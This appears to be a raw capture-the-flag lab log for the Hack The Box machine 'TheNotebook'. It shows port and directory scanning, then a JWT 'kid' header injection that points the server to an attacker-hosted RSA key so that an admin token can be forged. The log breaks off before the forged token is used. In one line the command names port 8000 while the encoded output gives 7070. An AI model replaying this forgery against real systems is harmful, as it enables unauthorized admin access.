$ sudo nmap -p- -T4 -A 10.10.10.230
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
$ dirb http://10.10.10.230
---- Scanning URL: http://10.10.10.230/ ----
+ http://10.10.10.230/admin (CODE:403|SIZE:9)
+ http://10.10.10.230/login (CODE:200|SIZE:1250)
+ http://10.10.10.230/logout (CODE:302|SIZE:209)
+ http://10.10.10.230/register (CODE:200|SIZE:1422)
$ nikto -h http://10.10.10.230
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /static/favicon.ico, inode: 1605673424.0, size: 15406, mtime: 2935163750
+ Allowed HTTP Methods: HEAD, GET, OPTIONS
+ 7864 requests: 0 error(s) and 5 item(s) reported on remote host
Register user cpt on http://10.10.10.230/register ,go to devloper's console and copy the auth token from the cookies tab, decode.
$ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9 | base64 -d
{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}
0:"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9"
{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}
1:"eyJ1c2VybmFtZSI6ImNwdCIsImVtYWlsIjoiY3B0QGhhY2t0aGVib3guaHRiIiwiYWRtaW5fY2FwIjpmYWxzZX0"
{"username":"cpt","email":"cpt@hackthebox.htb","admin_cap":false}
$ ssh-keygen -t rsa -b 4096 -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:pyvOvTRUA8XPh+721QNCW62N8HGGY+UlD/cdNlR0ny0 kali@kali
The key's randomart image is:
+---[RSA 4096]----+
| .o. +BB|
| .. *=@|
| o= BE**|
| ...X X. |
| S .+ * . |
| . o o . .|
| + . .o|
| ..o o o ..|
| .o.+. . .. |
+----[SHA256]-----+
kali@kali:~/0.htb/machines/TheNotebook230$ sudo python3 -m http.server
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)
1.$ echo '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.133:8000/privKey.key"}' |base64
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4xMzM6NzA3MC9wcml2S2V5LmtleSJ9Cg==
2.$ echo '{"username":"cpt","email":"cpt@hackthebox.htb","admin_cap":true}' |base64
eyJ1c2VybmFtZSI6ImNwdCIsImVtYWlsIjoiY3B0QGhhY2t0aGVib3guaHRiIiwiYWRtaW5fY2FwIjp0cnVlfQo=